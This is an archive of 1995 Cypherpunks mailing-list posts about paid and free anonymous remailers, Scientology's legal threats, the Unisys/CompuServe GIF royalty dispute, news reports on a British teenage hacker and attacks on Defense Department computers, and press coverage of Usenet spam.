   On their own networks, surely.
 
> is how can they regulate what private business and citizen's do with 
> there Fiber Optic's, ISDN lines, telephone lines, and computers. If the

   They already do - look at the regulations on telcos, power companies, 
water companies, cellular/paging companies, lawyers, doctors, etc. 
 
> government was to ban anything on the net, it would shurly seem to me to 
> be in violation of the first ammenment. Things like pirated software, 

   An interesting point.  Any legal views from someone more versed in the 
law than I?

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathan Cooper <entropy@IntNet.net>
Date: Wed, 4 Jan 95 16:40:13 PST
To: Doug Barnes <db@Tadpole.COM>
Subject: Re: Remailer Abuse
In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com>
Message-ID: <Pine.SV4.3.91.950104192839.17118I-100000@xcalibur>
MIME-Version: 1.0
Content-Type: text/plain


> The problem with a _free_ remailer is obvious -- like many
> other Internet resources, it can suffer from the tragedy of
> the commons. 

    See the remailer at c2.org as an example - quite nice, and has a 
pay-for-more than n bandwidth agreement.  Works fine for a few small 
chatty messages, won't work worth a damn for spamming.

-jon

( --------[ Jonathan D. Cooper ]--------[ entropy@intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4  5B 12 A0 35 E0 9B C0 01 )
( home page: http://taz.hyperreal.com/~entropy/ ]---[ Key-ID: 4082CCB5 )




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Wed, 4 Jan 95 17:31:32 PST
To: db@Tadpole.COM
Subject: Re: Remailer Abuse
In-Reply-To: <9501042320.AA07624@tadpole.tadpole.com>
Message-ID: <m0rPh5t-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: db@Tadpole.COM (Doug Barnes)
   Date: Wed, 4 Jan 1995 16:38:21 -0600 (CST)
   Cc: cypherpunks@toad.com

   The problem with a _free_ remailer is obvious -- like many
   other Internet resources, it can suffer from the tragedy of
   the commons. 

   Even a negligible fee would do much to prevent gross remailer
   abuse. It may not be feasible to make remailers in to an
   industry, but this isn't the point -- it will keep the utterly
   lame from using it for pranks and their ilk.

Use First Virtual.  The "information" that you sell is a one-time
email alias that points to your remailer.  After an hour, that email
alias gets disabled.  This dynamic setup is easy to do with smail,
just a matter of dropping a file into a directory.

And who cares if they pay you or not, because if they don't pay
(choose to purchase the information), eventually FV will cancel their
account.

Send mail to info@fv.com.  This gets you an automated response.

Their contract says that they won't enforce payment on services, so if
you offer a service, you're completely at risk, but again, there's not
much real risk here...

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 4 Jan 95 17:37:07 PST
To: Aron Freed <cypherpunks@toad.com
Subject: Re: good news about the EFF...
Message-ID: <ab30fe08050210045295@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:23 PM 01/01/95, Aron Freed wrote:
>Has anyone seen Monty Python's Life of Brian.....  DO I hear a parallelism???
>Something to the effect of "The PEople's Judean Front", "The Popular
>People's Front", and it goes on an on....
>
>HOw about for the modern approach.... CDT, EFF, CPSR, Cypherpunks... Do I
>hear more.. Or are we so split up that we can't agree on our common goal....

The more the merrier, in my opinion. As long as they can all get funding,
which admittedly could be a problem, but presumably if it is then some of
the organizations will just drop out. *shrug*  But in general,
decentralization is good, right?  I'd rather have 5 organizations defending
electronic rights then just one, when we know all too well how possible it
is for that just one to negotiate a compromise that seems more like a
betrayal.  The more active, funded organizations, the more it appears to
legislators like people are really concerned about this stuff, and the
safer we are against point-failure.  Decentralize, distribute, good.  :)

[Of course it remains to be seen if so many organizations at once can
remain active and well funded.]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 4 Jan 95 13:02:33 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
Message-ID: <9501042102.AA22721@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain


>      These  confidential  materials  being posted were stolen from
>      my client.  There is reason to  believe  that  the  materials
>      which  are  uploaded by these users may also be downloaded by
>      other users, 


What makes him think that anyone (except thetans which spend all their
money to scientology anyway) wants to have this "material" and wastes 
any diskspace or bandwith for ?


Hadmut





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 20:52:46 PST
To: nelson@crynwr.com (Russell Nelson)
Subject: Re: Remailer Abuse
In-Reply-To: <m0rPh5t-0008ZFC@crynwr.crynwr.com>
Message-ID: <9501050453.AA10198@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain


>    The problem with a _free_ remailer is obvious -- like many
>    other Internet resources, it can suffer from the tragedy of
>    the commons. 
> 
>    Even a negligible fee would do much to prevent gross remailer
>    abuse. It may not be feasible to make remailers in to an
>    industry, but this isn't the point -- it will keep the utterly
>    lame from using it for pranks and their ilk.
> 
> Use First Virtual.  The "information" that you sell is a one-time
> email alias that points to your remailer.  After an hour, that email
> alias gets disabled.  This dynamic setup is easy to do with smail,
> just a matter of dropping a file into a directory.

Heh. An anonymous remailer paid for by credit card... there'd
have to be an additional level of indirection for it to work,
which would make the methods for tracking those who don't pay
quite problematic.

Also, most remailer abuse tends to be of the hit-and-run variety,
which is still nicely enabled by FV.

Anonymous remailers pretty much require anonymous digital cash,
although this could be built on top of some other electronic
payment system with somewhat less payment lag and reversability 
than FV.

Doug




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Wed, 4 Jan 95 19:11:15 PST
To: cypherpunks@toad.com
Subject: The NYTimes article
Message-ID: <m0rPif2-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times article is on Nando (News and Observer)'s WWW server:

http://www.nando.net/newsroom/nt/inf/01029537644.html

For those who haven't seen it...

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: db@Tadpole.COM (Doug Barnes)
Date: Wed, 4 Jan 95 20:58:12 PST
To: entropy@IntNet.net (Jonathan Cooper)
Subject: Re: Remailer Abuse
In-Reply-To: <Pine.SV4.3.91.950104192839.17118I-100000@xcalibur>
Message-ID: <9501050458.AA10237@tadpole.tadpole.com>
MIME-Version: 1.0
Content-Type: text/plain


>     See the remailer at c2.org as an example - quite nice, and has a 
> pay-for-more than n bandwidth agreement.  Works fine for a few small 
> chatty messages, won't work worth a damn for spamming.
> 

I like both this idea and this particular service. I didn't mean to
imply that nobody was charging/reducing spam.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wulkwa@near.net
Date: Wed, 4 Jan 95 13:47:22 PST
To: cypherpunks@toad.com
Subject: Regulatory Risks
Message-ID: <199501042146.QAA08343@nova.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


I think it's important to realize that organizations move on a slower
time scale than people.  The larger the organization, the longer the
time scale.  Thus, when looking at the government's response to
anonymous transactions it would be wise to look at trends dating back
to the '70s (if not earlier).  Also, it's important to realize that
such long-term activities are systemic in nature.

Examples of government attacks on anonymous activities might include
the war on drugs (especially the money laundering countermeasures).

W.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aron Freed <s009amf@discover.wright.edu>
Date: Wed, 4 Jan 95 20:30:14 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: good news about the EFF...
In-Reply-To: <ab30fe08050210045295@[132.162.201.201]>
Message-ID: <Pine.SUN.3.91.950104232756.9001A-100000@discover>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Jan 1995, Jonathan Rochkind wrote:
> which admittedly could be a problem, but presumably if it is then some of
> the organizations will just drop out. *shrug*  But in general,
> decentralization is good, right?  I'd rather have 5 organizations defending
> electronic rights then just one, when we know all too well how possible it
> is for that just one to negotiate a compromise that seems more like a
> betrayal.  The more active, funded organizations, the more it appears to
> legislators like people are really concerned about this stuff, and the
> safer we are against point-failure.  Decentralize, distribute, good.  :)
> 
> [Of course it remains to be seen if so many organizations at once can
> remain active and well funded.]

A good point, but I was just trying to make the point of too many 
organizations becomes very silly....

But thanks for pointing out the other extereme...




| A(a)ron M. Freed            | It is naive to believe people are honest. |
| s009amf@discover.wright.edu | It is naive to believe programmers are    |
| (513)276-3817 (voice)       | honest. It is even more naive to believe  |
| (513)276-4158 (data/fax)    | the government is honest. Down with Big   |
|			      | Brother.		                  |
|_____________________________|___________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Thu, 5 Jan 95 00:02:06 PST
To: cypherpunks@toad.com
Subject: Re: Warning letter from Co$. [any comments ?]
In-Reply-To: <199501042047.PAA06797@cutter.clas.ufl.edu>
Message-ID: <199501050801.AAA18013@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Avi Harris Baumstein <avi@clas.ufl.edu>

   i know there has been much chatter on this subject, but are there
   truly any precedents that could hold on the anonymous distribution of
   copyrighted material?

Cubby v. Compuserve is relevant here, as well as that bookstore case
in the 50's that I never remember the name of.  Mike G., can you help
me out on this one?

These cases are about other kinds of wrongs (libel in one and
obscenity (?) in the other), but copyright violation doesn't seem to
be have any particular features to set it apart from the basic
principle of these.  Namely, if you know, you're responsible; if you
don't, you're not.  This, you all realize no doubt, is a gross
simplification of a long chain of reasoning.

   what
   exactly constitutes a trade secret, and what sort of laws apply?

The short answer is that if you didn't sign a trade secret agreement
or are party to one by some other relationship (such as agency), then
a trade secret that comes your way is no secret any more.

   >    clients'  property   rights.    Courts   are   holding   such
   >    contributory  infringers  liable.   Two  examples  are:  Sega
   >    Enterprises Ltd.  v.  Maphia BBS, 30 U.S.P.Q.  2d 1921  (N.D.
   >    Cal.   1994) and Playboy Enterprises v.  Frena, 839 F.  Supp.
   >    1152 (M.D.  Fla.  1993).

   what of these cases? is this just an example of typical lawyerly
   intimidation tactics? 

I have personal experience with the first case.  It was a local BBS
run by a friend of a friend, and I got involved a year ago right after
the seizure.  (It was, BTW, a _civil_ seizure of a BBS, not criminal.)
I believe the case settled out of court.  There were court documents
approving the seizure however; I don't know if these set precedent or
not.  I suspect not, because the action was entirely _ex parte_ (Latin
for one-sided).  Mike, again?  Other legal folk?

I know nothing about the second one.

   nhow do you remailer-ops plan to react? my first
   instinct (were i running a remailer) would be to ignore it, on grounds
   that i wouldn't examine any mail passing through. 

The people who keep logs, yes, are in more danger than those who don't.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Wed, 4 Jan 95 20:58:24 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
Message-ID: <199501050503.AAA07022@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

The Dalai Lama writes:
> I know that in Delaware it is illegal for a merchant to request ID when 
> you pay by credit card.  I'm not sure if this is wide spread or just 
> local. 

As I recall there was something of a national outcry about this practice
several years back. I think California outlawed it at the time, along with
other states, though I don't know if any federal law was passed.

Since I understand MBNA America is the second-largest employer in Delaware,
I'd guess that if Delaware banned it, so did most states.

Retail stores often asked one to write one's phone number on the check when
paying that way. I remember my father habitually writing the police dept.'s
non-emergency number in all such cases :]

> -- [Here's something for those friendly mail scanners...]
> [...] LSD-25 plutonium north korea terrorist encryption die NSA CERT quiche

"quiche" ?  

The *real* Four Horsemen don't eat quiche !

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwt8YWf7YYibNzjpAQF02QP/dTKpXWYIIQmc53X+TqctbvSY3Lv2Rohz
GP1Lm1RXkMtmEPfsLgmZOg6J+E7dw6NYlr9rpANLHsy3Hf7lPlMSbVKNJ/b3dO7z
6Cox4ve2hG1WjLaHu8tKbzW1mPWASX+wojyvJhe8dX1wCEdlUkJk7qMk5kSLWqKk
K4X8H7MH5Nw=
=noOA
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwt9kSoZzwIn1bdtAQFIrgF+OxMRUbtLW4JhKFMxvdNg62v6Lqdb5Bog
IRrUySoeo39h5EL9474TY9Gnd4r7debR
=iplm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an172607@anon.penet.fi (duquesne duke)
Date: Wed, 4 Jan 95 17:24:22 PST
To: cypherpunks@toad.com
Subject: gif format in newsbytes
Message-ID: <9501050029.AA25564@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain



CompuServe GIF License & Royalties Raises Hackles
COLUMBUS, OHIO, U.S.A., 1995 JAN 4 (NB) -- On-line giant CompuServe has
sparked controversy on the Internet by offering a $1-plus-royalties license
for developers to use its previously free GIF (Graphics Interchange Format)
image file format. CompuServe terms the fee an offer and a benefit to the on-
line community, but skeptics quickly dubbed it a "GIF tax."

The new fee system is based on a licensing agreement reached between
CompuServe and Unisys Corp. (NYSE:UIS) in June, 1994, for use of LZW (Lempel-
Zev-Welch) compression in its GIF format. Unisys has claimed a patent on LZW
technology.

Under the CompuServe agreement, developers who wish to operate under the on-
line firm's LZW license agreement with Unisys pay a one-time fee of $1 plus a
royalty of 1.5 percent or 15 cents per registered program, whichever is
greater. Downloaded programs that do not get registered are not subject to
the fee, nor are end-users.

CompuServe announced the new fee system in various areas or "forums" of the
service on December 29. The timing has led to suspicions by some that the
service was not being fully honest with its members.

In an open letter, Pat Clawson, president and chief executive officer (CEO)
of TeleGrafix Communications Inc., called it "the online communications
community's equivalent of the sneak attack at Pearl Harbor," and added: "The
announcement of the CompuServe-Unisys GIF Tax on December 29, during the lull
between Christmas and New Year's Day, was clearly timed to cause maximum
damage while an unsuspecting public celebrated the holidays."

Clawson said his firm, which developed the RIPscrip 2.0 online multimedia
technology and the RIPTERM terminal program that leans heavily on the JPEG
(Joint Photographic Experts Group) image format, will drop support of GIF
images because of the new fee system. RIPscrip 2.0 is scheduled for release
January 16.

Speaking to Newsbytes, CompuServe spokesman Pierce Reid acknowledged that the
release date may have been unfortunate from a public relations viewpoint, but
he said it was an accident of timing, not a desire to avoid public scrutiny.

Reid pointed out that it took a year and a half to hammer out a licensing
agreement with Unisys Corp. (NYSE:UIS). Unisys holds a patent on the GIF
format's underlying LZW compression technology. Once the agreement with
Unisys was signed in June, 1994, he added, it took CompuServe another six
months to arrive at a way to, as he put it, "share" the license.

"Six months is not a long time to settle the details of a licensing
agreement, if you know how these things work," he told Newsbytes. "We're not
making any money on this. We paid a substantial fee to Unisys for the
license, and we offered to share the license for the benefit of the
development community as well as for ourselves and our subscribers."

Reid said the license was based on the fact that CompuServe had found merit
in a Unisys patent claim. CompuServe had used the patented LZW technology in
its 1987 development of the GIF format, believing the technology to be in the
public domain. Unisys contacted the on-line firm about its patent claim in
1993, and that eventually led to the December 29 announcement, the firm said.

Commented Reid: "I've been watching the Internet, and those who are
commenting are on a bell curve -- the vast majority are taking a reasonable
view, but there are always those out on the extreme ends.

"A number of people regard this as a real benefit. CompuServe, by requiring
no money for negotiations, is saving developers from the need to waste time.
There's no worrying about legal or licensing issues, and we've done that for
a dollar."

(Craig Menefee/19950104/Press Contact: Pierce Reid, CompuServe, 614-538-4571;
Pat Clawson, TeleGrafix, 714-379-2140, Internet e-mail
rip.support@telegrafix.com; Oliver Picher, Unisys, 215-986-5367)


Unisys Seeks Royalties On GIF Algorithm
BLUE BELL, PENNSYLVANIA, U.S.A., 1995 JAN 4 (NB) -- Unisys Corp. (NYSE:UIS)
said it will seek royalty payments from developers of software using the
Graphic Interchange Format (GIF). Unisys said it owns rights to an algorithm
that is widely used in GIF tools.

Oliver Picher, a spokesman for Unisys, told Newsbytes that the online service
CompuServe introduced the GIF format in 1987, and incorporated the Unisys
algorithm, apparently believing it was in the public domain. Unisys learned
that the algorithm was used in the GIF technology about two years ago,
contacted CompuServe, and in June, 1994, the companies reached an agreement
under which CompuServe paid Unisys an undisclosed sum for use of the
algorithm.

The payment was "a reasonable amount but not an overwhelming amount," Picher
said, declining to reveal the exact sum.

CompuServe was the first to license the algorithm from Unisys for use in a
GIF tool, Picher said, but about 100 companies have licensed it for other
purposes. Picher said one other online information service has already
licensed the algorithm, but could not say if it was for GIF-related use in
that case.

Unisys is negotiating with all the major online services for possible license
agreements, Picher said. While he would not give specifics, he said the terms
Unisys is seeking are "very reasonable to the point where license fees
shouldn't be a barrier" to using GIF. He added that people who have GIF
software on their PCs will not be affected.

The same algorithm is also used in the Tagged Image File Format (TIFF)
graphics format, and Unisys concluded a license agreement with Aldus Corp.
some time ago, Picher said.

(Grant Buckler/19950104/Press Contact: Oliver Picher, Unisys, 215-986-5367)


-------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
Due to the double-blind, any mail replies to this message will be anonymized,
and an anonymous id will be allocated automatically. You have been warned.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Name withheld on request)
Date: Wed, 4 Jan 95 18:35:29 PST
To: cypherpunks@toad.com
Subject: British Hacker Story
Message-ID: <199501050236.AA22300@xs1.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



   From: newsbytes@clarinet.com (NB-LON)
   Subject: London Newspaper Runs Old "Superhacker" Story
   01/03/95
   Date: 3 Jan 95 20:44:22 GMT

   LONDON, ENGLAND, 1995 JAN 3 (NB) -- As the UK started back
   to work today after the long Christmas and New Year
   shutdown, readers of the Independent newspaper were treated
   to the banner headline "British Boy Raided US Defense
   Secrets."

   The curious thing about the story was that none of the
   other nationalpapers or news wires carried any reports. On
   investigation, Newsbytes discovered why -- the story dates
   back to July of last year, and briefly resurfaced in early
   November on the US news wires.

   According to the Independent, a 16-year-old British boy has
   been arrested in connection with a alleged unauthorized
   intrusions into the US government's computers and "was able
   to watch secret communications between US agents in North
   Korea during the crisis over nuclear inspections last
   spring."

   The story is quite correct, except that the boy in question
   was arrested last July, when the original story broke.
   Commenting on the story, Peter Sommer, a leading security
   consultant and a senior with the Computer Research Center
   at the London School of Economics, said that it smacked of
   the British Telecom secrets case of late November,also
   reported in the Independent.

   That story, as reported by Newsbytes, turned out to be
   something of a non-event when the hacker, who posted
   details of top secret files on BT's ex-directory computer
   "across the Internet," turned out to be Steve Fleming, a
   Scottish freelance journalist who worked as a temp for BT
   in the summer and broke BT's own security rules by
   downloading files from the BT's Customer Service System
   (CSS) computer, then mailed them -- across the Internet --
   to other people.

   "I'm amazed at the Independent running yet another story
   involving the Internet," Sommer told Newsbytes, adding that
   it is "a very old story. It seems that all they have to do
   is to work up a story about a hacking attempt, whether
   successful or not, and weave in a story about the Internet,
   and it's a headline story."

   Ken Young, newly installed editor of Communicate, a leading
   industry communications magazine in London, and a veteran
   of the UK communications industry for more than a decade,
   told Newsbytes that the story seemed a little thin.

   "It looks like another hacking story except that (the
   newspaper) has written in something about the Internet, and
   bingo! You've got a report that the information was
   accessible to 32 million users on the Internet," he said.

   Sommer, meanwhile, told Newsbytes that he had made his own
   discreet inquiries about the story with high level
   authorities when it broke last summer.

   "There are two problems with this case. Firstly, any lawyer
   worth his salt would invoke Section 69 of the Police &
   Criminal Evidence Act," he said. This Act, Sommer
   explained, requires that, before a computer can be
   considered as admissible evidence in court, the owner of
   the computer must issue a certificate of correct working.

   This, he said, could not be issued, as a casual user of a
   PC would be unable to make such a certification.

   Sommer went on to explain that the second reason that the
   case could be problematic for the prosecution was "that the
   lawyer would ask the court for full disclosure of all
   affected files on victim's host computers," which, since
   such files are almost certain to be classified in the US,
   could not be revealed in a British courtroom.

   The facts surrounding the case, as reported by Newsbytes,
   were that the 16-year-old -- operating under the code name
   of Data Stream -- was one of several who gained
   unauthorized access to the US defense computer network in
   late 1993 and early 1994 and that some files were deleted.

   At the time, press reports said that as many as a million
   passwords were compromised, and may have compromised the
   military readiness of the United States. The case has,
   Newsbytes understands, been fully investigated by the US
   Air Force Office of Special Investigations (OSI) although
   details of the report of the investigation by the USAF OSI
   are classified.

   Originally, the press reports of the time speculated
   whether the youth would be the first under-18 to be
   extradited to the US to face charges. It seems that,
   following last summer's arrest and submission of the report
   to the Crown Prosecution Service that the case is being
   quietly shuffled into a file because of the practical
   problems in pursuing a prosecution.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@ducie.cs.umass.edu>
Date: Thu, 5 Jan 95 00:59:11 PST
To: cypherpunks@toad.com
Subject: Re: C'punks Economist Fan Club
Message-ID: <199501050904.EAA09785@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

> Why is it that so many cypherpunks like the economist?

The Economist is my favorite magazine (my parents' too). I don't read it
regularly, but that has more to do with my being busy than anything else.

It succeeds in providing fairly balanced in-depth coverage of international 
news that isn't terribly Amerocentric or Anglocentric. At worst it's 
G7-centric, but I think that's entirely reasonable ;)  It's witty, politically
aware, relatively technically savvy. The articles exhibit a healthy (IMHO)
cynicism about what happens and why, yet maintain some idealism about what
should happen. It's not perfect, but it's difficult to imagine surpassing it.

I recently read an interview with Bill Gates in which he was asked which
periodicals he reads. His first response was: "The Economist, every page".

 -L. Futplex McCarthy; PGP key by finger or server   "The objective is for us 
  to get those conversations whether they're by an alligator clip or ones and 
  zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLwu1BGf7YYibNzjpAQH9nAP/SMG+SpBKMnW0owZJb8mH1+boR8veHxZR
ZHF88L2XRKb4PRvzBho8oukfGAneaTJ45EaApZ7PAcz+zWin3PT3IHl6KqsgZger
nHl2g7HHVqVO+XXbcpM3eSzvfA8lzbQgWLGM+0RAguYjAPFoMgWNunDU7xUrfuwY
66mBQMCNUlo=
=QPTj
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLwu2ISoZzwIn1bdtAQEw0wGA4UqmMyxtaoR6nzs54zUesF2CvvSROy6O
xAOR//mT0N6v7oLdhTmOHlWDVeFqJBXw
=M8TG
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Thu, 5 Jan 95 04:20:20 PST
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <v01510100ab319028d7be@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Factoids lifted from apple-internet-users@medraut.apple.com:

>Jonathan P. Sullivan <jsullivan@arpa.mil> wrote :

> Here are some other stats culled from an article in the 12/22/94 edition of
> Washington Technology:
>
>* Approximately 300,000 attacks have been made on DoD computers
>* Hackers have successfully compromised 350 DoD computer systems
>* 88% of all information warfare attacks succeed
>* 96% of those successful attacks are never noticed
>* Only 4% of those noticed are reported

Cheers,
Bob Hettinga

-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Thu, 5 Jan 95 04:29:02 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
In-Reply-To: <9501050453.AA10198@tadpole.tadpole.com>
Message-ID: <m0rPrN8-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   From: db@Tadpole.COM (Doug Barnes)
   Date: Wed, 4 Jan 1995 22:11:11 -0600 (CST)

   Heh. An anonymous remailer paid for by credit card... there'd
   have to be an additional level of indirection for it to work,
   which would make the methods for tracking those who don't pay
   quite problematic.

Why wouldn't it work?  I plan on doing this, and I'll be selling lots
of things besides a remailer, including lots of email traffic.  So
there won't be any effective way to find out who paid for access to my
remailer.

Sure, I'll know who used it, but I'm not going to keep that
information.  (Yes, yes, FV says that I have to keep records of who
bought what, but I'll label all my information with a random number,
that simply says that X bought information worth Y, not *what*
information.)  And if you don't trust a remailer operator, then you
won't use it.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 5 Jan 95 05:24:23 PST
To: Michael Conlen <meconlen@intnet.net>
Subject: Re: Siegel and Lewis
In-Reply-To: <Pine.SV4.3.91.950104173902.16102A-100000@xcalibur>
Message-ID: <9501051324.AA16313@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Michael Conlen says:
> As I understand it, the government owns a portion of the internet.

Nope. Sorry. They don't.

> 	Does anyone have any information on what grouds Seigel and Lewis 
> plan to use for legislation?

Peter Lewis is a reporter, and to my knowledge has no plans to lose
his job by lobbying for legislation. I am unaware of what his opinions
on this topic might be. My only beef with him is that his stories tend
to be full of inaccuracies. This mornings, for instance, gave the
impression that there are no unpatented algorithms available to do
high-quality compression -- when of course, there are many.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Thomas <jthomas@access.digex.net>
Date: Thu, 5 Jan 95 05:50:35 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: Remailer Abuse
In-Reply-To: <m0rPrN8-0008ZFC@crynwr.crynwr.com>
Message-ID: <Pine.SUN.3.91.950105083939.3030A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 5 Jan 1995, Russell Nelson wrote:

>    From: db@Tadpole.COM (Doug Barnes)
>    Heh. An anonymous remailer paid for by credit card... there'd
>    have to be an additional level of indirection for it to work,
>    which would make the methods for tracking those who don't pay
>    quite problematic.

> Why wouldn't it work?  I plan on doing this, and I'll be selling lots
> of things besides a remailer, including lots of email traffic.  So
> there won't be any effective way to find out who paid for access to my
> remailer.

Another thought:  why couldn't you sell a book of "stamps" -- Magic Money 
tokens -- and get paid for them using First Virtual?  This would get 
around two problems:  the lack of anonymity using First Virtual, and the 
fairly high 29-cent-per-transaction fee.  You could sell a book of twenty 
remailer stamps for a dollar, or something.  I'd buy.

And it wouldn't make it too easy for people to use remailers without 
paying.  FV will still take an account away from someone who denies 
legitimate charges too many times.

I guess there is the problem of Chaum's patents (and RSA's).  Is there 
anyplace where neither set of patents is valid, or where they'd be 
practically unenforceable?

Joe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tommy the Tourist (Anon User) <nobody@CSUA.Berkeley.EDU>
Date: Thu, 5 Jan 95 08:51:05 PST
To: cypherpunks@toad.com
Subject: _Why_ the print media doesn't like Usenet
Message-ID: <199501051651.IAA24155@soda.CSUA.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


As many of you know, recent articles and editorials
in the nations main newspapers
(_New_York_Times and the _Chicago_Tribute_ to name just two) have
presented shockingly distorted accounts of the infamous
Canter & Siegel Usenet spam. 

Ordinary Usenetters, outraged at the
socking abuse of the internet by Canter & Siegel, were transformed
into "network terrorists" in these editorials.
The attorneys, who have haughtily expressed their determination to repeatedly
inconvenience millions of Usenet readers by flooding Usenet newsgroups
with unsolicited advertisements, were portrayed as the innocent victims
of anti-business "vigilantes" bent on terrorizing the attorneys after their
widespread Usenet spam last year. The articles also included numerous
serious technological inexactitudes which supported the distorted conclusions
of the articles.

The articles called for increased government regulation of the internet
in order to thwart the alleged abuses.

Determined efforts by Usenetters to educate the print media into presenting
a more balanced (and, I might add, less dis-ingenuous point of view) have
been in vein.

It seems reasonable to point out the following facts:

1. It has not been unknown for powerful individuals in newspapers (such
as editors and owners) to manipulate articles for political purposes.

2. Usenet has often been highly critical of the print media, especially
editorials which disagreed with strongly held Usenet views and articles
which contained erroneous information. This criticism may have been
seen by the print media as damaging.

3. From time to time articles published in newspapers have been posted
